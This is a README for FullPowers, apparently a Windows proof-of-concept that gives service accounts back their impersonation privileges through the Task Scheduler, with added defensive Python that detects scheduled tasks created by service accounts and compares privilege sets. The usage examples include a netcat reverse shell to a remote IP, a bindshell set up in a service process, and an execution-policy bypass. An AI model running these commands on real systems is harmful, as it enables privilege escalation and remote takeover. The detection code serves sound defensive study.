dsb4 / fullpowers (forked from itm4n/fullpowers)

Recover the default privilege set of a LOCAL/NETWORK SERVICE account

Home Page: https://itm4n.github.io/localservice-privileges/

FullPowers

FullPowers is a Proof-of-Concept tool I made for automatically recovering the default privilege set of a service account including SeAssignPrimaryToken and SeImpersonate.

Rationale

On Windows, some services executed as LOCAL SERVICE or NETWORK SERVICE are configured to run with a restricted set of privileges. Therefore, even if the service is compromised, you won't get the golden impersonation privileges and privilege escalation to LOCAL SYSTEM should be more complicated. However, I found that, when you create a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.

For more information: https://itm4n.github.io/localservice-privileges/
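From the defender's side, the observable the Rationale describes is a scheduled task being registered by LOCAL SERVICE or NETWORK SERVICE, which few legitimate services do. The following Python, added here as an example and not part of the FullPowers project, parses Windows Security event 4698 ("A scheduled task was created") records in their native event XML and flags those whose SubjectUserSid is S-1-5-19 (LOCAL SERVICE) or S-1-5-20 (NETWORK SERVICE), with a task-name allowlist for baselined exceptions. The event records, computer names and task names are constructed sample data; on a real host, 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Real namespaces used by Windows event XML and by scheduled task definitions.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
EVENT_TASK_CREATED = "4698"  # Security log: "A scheduled task was created"

# Well-known SIDs of the two accounts the README says this tool runs as.
SERVICE_ACCOUNT_SIDS = {
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}


def parse_event(xml_text):
    """Return EventID, Computer and every <Data Name=...> field of one event."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    record = {
        "EventID": system.findtext("e:EventID", default="", namespaces=NS),
        "Computer": system.findtext("e:Computer", default="", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        record[data.get("Name", "")] = (data.text or "").strip()
    return record


def task_command(task_content_xml):
    """Extract the <Exec> command line from the task definition in TaskContent."""
    if not task_content_xml:
        return ""
    try:
        task = ET.fromstring(task_content_xml)
    except ET.ParseError:
        return ""
    cmd = task.findtext(".//t:Exec/t:Command", default="", namespaces=TASK_NS)
    args = task.findtext(".//t:Exec/t:Arguments", default="", namespaces=TASK_NS)
    return (cmd + " " + args).strip()


def flag_service_account_tasks(records, allowlist=frozenset()):
    """Return 4698 records created by LOCAL/NETWORK SERVICE, minus allowlisted task names."""
    hits = []
    for r in records:
        if r.get("EventID") != EVENT_TASK_CREATED:
            continue
        sid = r.get("SubjectUserSid", "")
        if sid not in SERVICE_ACCOUNT_SIDS or r.get("TaskName") in allowlist:
            continue
        hits.append({
            "computer": r["Computer"],
            "account": SERVICE_ACCOUNT_SIDS[sid],
            "task": r.get("TaskName", ""),
            "command": task_command(r.get("TaskContent", "")),
        })
    return hits


# --- constructed sample data (not real telemetry) ---------------------------
def make_event(event_id, computer, fields):
    """Build a sample Security-log event in the shape Windows emits."""
    data = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System><EventData>{data}</EventData></Event>')


TASK_XML = ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Actions><Exec><Command>C:\\Windows\\System32\\cmd.exe</Command></Exec></Actions></Task>')

SAMPLE_EVENTS = [
    make_event("4698", "ws01", {"SubjectUserSid": "S-1-5-19", "SubjectUserName": "LOCAL SERVICE",
                                "TaskName": "\\ConstructedTask", "TaskContent": TASK_XML}),
    make_event("4698", "ws01", {"SubjectUserSid": "S-1-5-21-1111-2222-3333-1001",
                                "SubjectUserName": "alice", "TaskName": "\\Backup", "TaskContent": TASK_XML}),
    make_event("4698", "ws02", {"SubjectUserSid": "S-1-5-20", "SubjectUserName": "NETWORK SERVICE",
                                "TaskName": "\\Vendor\\KnownGood", "TaskContent": TASK_XML}),
    make_event("4624", "ws01", {"SubjectUserSid": "S-1-5-19"}),  # logon event, not a task creation
]


def run_demo(allowlist=frozenset({"\\Vendor\\KnownGood"})):
    return flag_service_account_tasks([parse_event(e) for e in SAMPLE_EVENTS], allowlist)


if __name__ == "__main__":
    for hit in run_demo():
        print(hit)
```

The allowlist is the baseline step: some vendor services do register tasks under NETWORK SERVICE, so tune it per environment rather than alerting on every hit. The command line pulled from TaskContent is what an analyst needs to triage the hit quickly.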

Usage

โš ๏ธ This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.

You can check the help message using the -h option.

c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

Example 1, basic usage

c:\TOOLS>FullPowers
[+] Started dummy thread with id 9976
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

Example 2, specify a custom command line

c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Started dummy thread with id 9028
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

Example 3, start a netcat reverse shell and exit

c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Started dummy thread with id 5482
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK

How-To

You want to test this PoC yourself? That's great! Here are some simple instructions to get you started.

The overall idea is to start a bindshell from the process of an existing service, connect to it and then run the executable.

  1. You'll need 2 third-party tools, netcat and RunFromProcess.
  2. Pick a service which has limited privileges, e.g.: upnphost.
  3. Open the Task Manager, go to the Services tab and get the PID of the corresponding process.
  4. Use the following command to start the bindshell as an administrator:
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  5. Use the following command to connect to the bindshell:
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  6. We can see that the current process has no impersonation privileges. Now run the PoC...
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

You should now have a shell with impersonation privileges!
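The before/after listings above are the evidence of what the technique changes. When auditing how far a service's effective token has been stripped compared with the account default, it helps to diff two `whoami /priv` captures mechanically. The following Python, added here as an example and not part of the FullPowers project, parses that table format and reports which privileges were gained or lost, singling out the two impersonation privileges. The two captures embedded below are the ones shown in this How-To, used as constructed sample input.

```python
# Privileges whose presence lets a process act as other security principals.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_whoami_priv(text):
    """Parse `whoami /priv` output into {privilege_name: state}.

    Rows start after the '=====' separator line; the first column is the
    privilege name and the last column is the state (Enabled/Disabled).
    """
    privs = {}
    past_separator = False
    for line in text.splitlines():
        if line.startswith("====="):
            past_separator = True
            continue
        if not past_separator or not line.strip():
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("Se"):
            privs[parts[0]] = parts[-1]
    return privs


def privilege_delta(before_text, after_text):
    """Compare two captures and report gained/lost privileges."""
    before = parse_whoami_priv(before_text)
    after = parse_whoami_priv(after_text)
    gained = sorted(set(after) - set(before))
    return {
        "gained": gained,
        "gained_impersonation": sorted(set(gained) & IMPERSONATION_PRIVS),
        "lost": sorted(set(before) - set(after)),
    }


# Constructed sample captures (copied from the listings shown in this How-To).
BEFORE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
"""

AFTER = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
"""

if __name__ == "__main__":
    print(privilege_delta(BEFORE, AFTER))
```

Run the same function over a capture from a hardened service and one from an unhardened one to see exactly which privileges the service's RequiredPrivileges configuration removed, which is the property the Rationale relies on.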
